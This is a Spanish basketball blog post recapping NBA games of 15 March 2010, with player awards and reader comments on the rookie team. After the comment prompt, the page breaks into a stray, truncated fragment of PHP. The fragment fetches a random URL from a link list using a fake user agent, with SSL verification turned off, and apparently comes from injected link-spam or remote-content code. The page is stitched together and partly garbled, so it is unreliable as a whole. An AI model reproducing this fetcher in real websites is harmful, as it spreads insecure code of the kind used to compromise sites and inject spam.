La Crónica (15/03/2010)

16 de March de 2010 por txusma

Un partido destaca por encima del resto. En el Toyota Center de Houston pudimos ver un inspirado intercambio de golpes entre dos poderosos equipos que, anoche, estaban por la labor de ofrecernos espectáculo por encima de defensas y especulaciones. Los Nuggets llegaban finos, en medio de una racha victoriosa y con las armas bien afiladas a excepción de Kenyon Martin, lesionado. Karl buscó explotar el teórico punto débil de los locales alineando a Petro junto a Nene. Sin embargo, Scola está fortísimo y aguantó el juego interior de los Rockets con solvencia. Por fuera duelo de lujo con Billups-Melo (sobre todo este último , completamente desatado) vs. Brooks&Martin. Fue un partido de aciertos con porcentajes altísimos y muy pocas pérdidas en ambos bandos. Se llegó a los últimos 20 segundos empatados tras canastón de Melo, sobre el que Battier y Ariza se mostraron impotentes. Ahí la velocidad de Brooks le brindó un tiro abierto al que no llegó Billups. Carmelo Anthony se convierte en el 2º hombre después de Monta Ellis que pierde este curso después de anotar más de 40 puntos.

Después los Warriors se los pusieron de corbata a los Lakers y de qué manera. Parece físicamente imposible que un equipo pueda disputar un partido a otro que le saca 30 rebotes de ventaja. También es alucinante que un equipo gane un partido perdiendo 20 balones más que sus rivales. Este es el caos en el que los Warriors viven y logran sacar ventaja en la medida que contagian a sus rivales. Era un día propicio en el que estaban especialmente acertados desde la línea de 3 y sobre las líneas de pase. Los Lakers jugaron bien en muchos aspectos y no se pusieron nerviosos. También tienen cierta costumbre de jugársela en el filo y se nota. Anoche el sistema de todas las patatas calientes a Kobe funcionó para aguantar el resultado. No es lo ideal pero da victorias que igual otros no hubieran sacado adelante.

Del resto de partidos, ni fú ni fá. Boston se comió a Detroit y Utah a Washington. Hubo cierta igualdad en la victoria de los Hornets frente a los Clippers, con un Baron Davis como nos gusta verlo y también en la de los Knicks frente a los Sixers. Sergió jugó algún minuto, pero Toney Douglas está impresionante.

PREMIOS

MVP: 31 puntos, 9 asistencias y canasta ganadora a menos de 3 segundos para el final. Partidazo el que anoche se cascó Aaron Brooks. Pau Gasol también fue de los destacados con 29 puntos (10 de 13), 9 rebotes y 4 asistencias.

Rookie: Últimamente los jugadores de la NBA parecen encaprichados en dejarnos en mal lugar. Si ayer decíamos que Evans era el claro favorito para alzarse con el ROY, hoy Stephen Curry, picado en su amor propio, se ha ido a los 29 puntos, 9 asistencias y 5 rebotes. Darren Collison sigue a lo suyo, 18 puntos, 14 asistencias y… ¿un lugar en el mejor quinteto rookie? ¿Cómo harán para meter a tanto base? Por cierto, Jrue Holiday, otro base, también está jugando un fin de temporada muy destacado. Anoche, se quedó relativamente cerca del triple doble con 18 puntos, 8 rebotes y 6 asistencias a los que añadió 3 robos.

Sorpresa: Desgraciadamente, este año no estamos muy acostumbrados a los grandes partidos de Baron Davis por eso tenemos que destacar los 18 puntos y 17 asistencias que ha logrado hoy aunque su equipo perdiera una vez más. Johan Petro consiguió ayer su segundo doble-doble en pocos días. ¿Alguien le seguía la pista?

Decepción: Pobre partido el de Thaddeus Young, 6 puntos, 2 rebotes y 2 asistencias. Parece completamente anclado en su evolución esta temporada. Anotar 5 canastas de 23 intentos debe desesperar hasta el límite a tus propios compañeros. Deberíamos preguntar a los de Monta Ellis que piensan del tema. Y dicen que Chris Kaman saltó ayer a al cancha pero el 3 de 15 y los 3 rebotes que consiguió en 31 minutos no son pruebas suficientes.

Esfuerzo en vano: Sin duda el de Carmelo Anthony, 45 puntos y 10 rebotes al limbo por culpa de un jugador que el año pasado parecía que no triunfaría en la NBA ni en 100 años.

Comenta

4 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Txus, que me pides por Holiday?

    Me alegro del partido de Baron, hacía eones que no se marcaba un partido de nivel.

      Citar

  2. Txusma dice:
    #2

    Ahora en serio, veremos un quinteto rookie formado por Jennings, Collison, Curry, Evans, Thorton? O meteran a Blair, Gibson o Jebreko para compensar posiciones?

      Citar

  3. sayim dice:
    #3

    Si meten ese quinteto, pues que la NBA deje de llamarlo quinteto y le llame ROOKIE TOP FIVE o algo así. Aunque estos cinco puede que lo merezcan, yo creo q meteran a Blair y quiza a Jebreko para compensar. Además creo que en el caso de Blair es justo, promedia casi 8 puntitos y 6 rebotes jugando 18 minutos en los Spurs. Este jugador si llega a caer en el draft en los Warriors promedia doble doble segurisimo…. Si la rodilla esa le aguanta, puede ser un proyecto de gran jugador: Anota facil, es intenso en defensa y ayuda mucho en el rebote…

      Citar

  4. Love Denise dice:
    #4

    A mi es que tantos premios, o galardones, o quintetos o como lo querais llamar me aburren un poco. Yo creo que con el Rookie of the Year y el Rookie del Mes ya hay bastante para premiar a los novatos. Idem para los demás (3 quintetos, quinteto defensivo, …., zzzzzz)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>